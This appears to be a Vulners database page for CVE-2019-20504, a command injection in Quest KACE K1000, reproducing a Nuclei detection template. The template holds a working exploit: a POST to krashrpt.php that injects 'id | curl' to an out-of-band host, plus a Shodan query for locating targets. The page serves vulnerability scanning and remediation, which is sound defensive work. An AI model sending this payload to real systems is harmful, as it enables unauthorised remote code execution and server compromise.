| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2019-20504 | 23 May 202521:02 | – | circl | |
| Quest Software KACE K1000 Systems Management Appliance Code Execution Vulnerability | 10 Mar 202000:00 | – | cnvd | |
| CVE-2019-20504 | 9 Mar 202000:55 | – | cve | |
| CVE-2019-20504 | 9 Mar 202000:55 | – | cvelist | |
| CVE-2019-20504 | 9 Mar 202001:15 | – | nvd | |
| CVE-2019-20504 | 9 Mar 202001:15 | – | osv | |
| Code injection | 9 Mar 202001:15 | – | prion | |
| CVE-2019-20504 | 22 May 202508:28 | – | redhatcve | |
| CVE-2019-20504 | 6 Mar 202020:15 | – | ubuntucve | |
| VulnCheck KEV: CVE-2019-20504 | 29 Jun 202400:00 | – | vulncheck_kev |
id: CVE-2019-20504
info:
name: Dell KACE Systems Management Appliance (K1000) 6.4.120756 - Remote Code Execution
author: DhiyaneshDk
severity: critical
description: |
service/krashrpt.php in Quest KACE K1000 Systems Management Appliance before 6.4 SP3 (6.4.120822) allows a remote attacker to execute code via shell metacharacters in the kuid parameter.
impact: |
Unauthenticated attackers can execute arbitrary system commands via shell metacharacters, leading to complete server compromise and access to all managed systems.
remediation: |
Upgrade to KACE K1000 version 6.4 SP3 (6.4.120822) or later.
reference:
- https://www.exploit-db.com/exploits/46684
- https://www.rcesecurity.com/2019/04/dell-kace-k1000-remote-code-execution-the-story-of-bug-k1-18652/
- https://nvd.nist.gov/vuln/detail/CVE-2019-20504
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-20504
cwe-id: CWE-78
epss-score: 0.0955
epss-percentile: 0.94869
cpe: cpe:2.3:a:quest:kace_systems_management:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: quest
product: kace_systems_management
shodan-query: html:"K1000 Logo"
tags: cve,cve2019,k1000,kace,rce,vkev,vuln
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body, "K1000")'
internal: true
- raw:
- |
POST /service/krashrpt.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
kuid=id | curl http://{{interactsh-url}}
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
# digest: 4a0a00473045022100cf08776158004f46d41523eaa18cd82ee3e13885ff759bf7fbbd93714561243202202bfc052d6532bc72cb1144b48ce8f9456bf5ba3a6fc6ef84f032b63353e6600d:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation